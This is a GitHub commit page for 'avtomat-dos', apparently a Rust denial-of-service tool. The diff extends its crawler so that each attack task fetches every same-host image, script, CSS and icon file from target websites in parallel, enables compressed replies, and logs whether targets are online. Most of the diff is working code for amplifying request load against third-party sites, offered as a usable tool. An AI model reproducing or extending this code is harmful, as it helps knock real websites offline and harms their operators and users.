Skip to content

Commit

Permalink
handle encoded replies, request scripts and css
Browse files Browse the repository at this point in the history
  • Loading branch information
Grrwahrr committed Apr 15, 2022
1 parent 79f9184 commit ed293de
Show file tree
Hide file tree
Showing 4 changed files with 47 additions and 10 deletions.
4 changes: 2 additions & 2 deletions Cargo.toml
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
[package]
name = "avtomat-dos"
version = "1.0.0"
version = "1.0.2"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
Expand All @@ -11,7 +11,7 @@ ed25519-dalek = "1.0.1"
futures = "0.3.21"
iced = { version = "0.3.0", features = ["tokio"] }
rand = "0.8.5"
reqwest = { version = "0.11", features = ["cookies"] }
reqwest = { version = "0.11", features = ["cookies", "gzip", "brotli"] }
select = "0.5.0"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
Expand Down
8 changes: 5 additions & 3 deletions build.rs
Original file line number Diff line number Diff line change
@@ -1,12 +1,14 @@
use std::io;
#[cfg(windows)] use winres::WindowsResource;
#[cfg(windows)]
use winres::WindowsResource;

fn main() -> io::Result<()> {
#[cfg(windows)] {
#[cfg(windows)]
{
WindowsResource::new()
// This path can be absolute, or relative to your crate root.
.set_icon("assets/app.ico")
.compile()?;
}
Ok(())
}
}
34 changes: 29 additions & 5 deletions src/crawler/mod.rs
Original file line number Diff line number Diff line change
Expand Up @@ -213,7 +213,7 @@ fn crawler_process_task_report(
state,
requests_send,
} => {
println!("TaskFinished: {target:?} {requests_send}");
println!("TaskFinished: {target:?} {state} {requests_send}");

// Reduce the number of active tasks
*active_tasks -= 1;
Expand Down Expand Up @@ -329,6 +329,8 @@ async fn crawler_crawl_website(url: String, headers: Headers) -> Option<(u32, Ta
let client = reqwest::ClientBuilder::new()
.cookie_store(true)
.user_agent(headers.agent)
.gzip(true)
.brotli(true)
.default_headers(header_map)
.tcp_keepalive(Duration::from_secs(5))
.timeout(Duration::from_secs(30))
Expand All @@ -350,17 +352,39 @@ async fn crawler_crawl_website(url: String, headers: Headers) -> Option<(u32, Ta
let html = res.text().await.unwrap_or_default();

// Try to find pictures on the same host, build a get request for each
let image_requests: Vec<Request> = Document::from(html.as_str())
let mut requests_images: Vec<Request> = Document::from(html.as_str())
.find(Name("img"))
.filter_map(|node| node.attr("src"))
.filter(|src| src.contains(&host) || !src.contains("://"))
.filter_map(|img| client.get(img).build().ok())
.collect();

// Try to find script files on the same host
let mut requests_scripts: Vec<Request> = Document::from(html.as_str())
.find(Name("script"))
.filter_map(|node| node.attr("src"))
.filter(|src| src.contains(&host) || !src.contains("://"))
.filter_map(|script| client.get(script).build().ok())
.collect();

// Try to find linked files on the same host (.ico, .css)
let mut requests_links: Vec<Request> = Document::from(html.as_str())
.find(Name("link"))
.filter_map(|node| node.attr("href"))
.filter(|src| {
(src.contains(&host) || !src.contains("://"))
&& (src.contains(".css") || src.contains(".ico") || src.contains(".png"))
})
.filter_map(|script| client.get(script).build().ok())
.collect();

let mut requests = Vec::new();
requests.append(&mut requests_images);
requests.append(&mut requests_scripts);
requests.append(&mut requests_links);

// Create a bunch of futures to fetch images
let futures = image_requests
.into_iter()
.map(|img_req| client.execute(img_req));
let futures = requests.into_iter().map(|img_req| client.execute(img_req));

// Send requests and wait for all images
let responses = futures::future::join_all(futures).await;
Expand Down
11 changes: 11 additions & 0 deletions src/crawler/target_picker.rs
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
use crate::targets::{hash_target, Target};
use std::collections::HashMap;
use std::fmt;
use std::ops::Add;
use std::time::{Duration, SystemTime};

Expand All @@ -11,6 +12,16 @@ pub enum TargetState {
Offline,
}

impl fmt::Display for TargetState {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
TargetState::Unknown => write!(f, "Unknown"),
TargetState::Online => write!(f, "Online"),
TargetState::Offline => write!(f, "Offline"),
}
}
}

/// Info about the target, whether it is online and when we can next send requests
struct TargetInfo {
target: Target,
Expand Down

0 comments on commit ed293de

Please sign in to comment.